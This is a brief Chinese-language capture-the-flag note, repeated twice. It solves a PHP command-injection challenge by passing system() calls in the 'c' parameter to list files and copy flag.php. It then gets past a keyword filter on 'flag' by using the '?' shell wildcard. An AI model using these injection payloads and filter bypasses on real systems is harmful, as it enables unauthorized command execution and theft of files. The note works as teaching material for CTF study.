2022/4/3
先查看文件有多少个
?c=system('ls');
先执行再访问
?c=system("cp flag.php 1.txt");
没执行成功,因为关键字flag被过滤了
把flag的g换成?
?c=system("cp fla?.php 1.txt");
?是占位符占一个位置,*占多个
2022/4/3
先查看文件有多少个
?c=system('ls');
先执行再访问
?c=system("cp flag.php 1.txt");
没执行成功,因为关键字flag被过滤了
把flag的g换成?
?c=system("cp fla?.php 1.txt");
?是占位符占一个位置,*占多个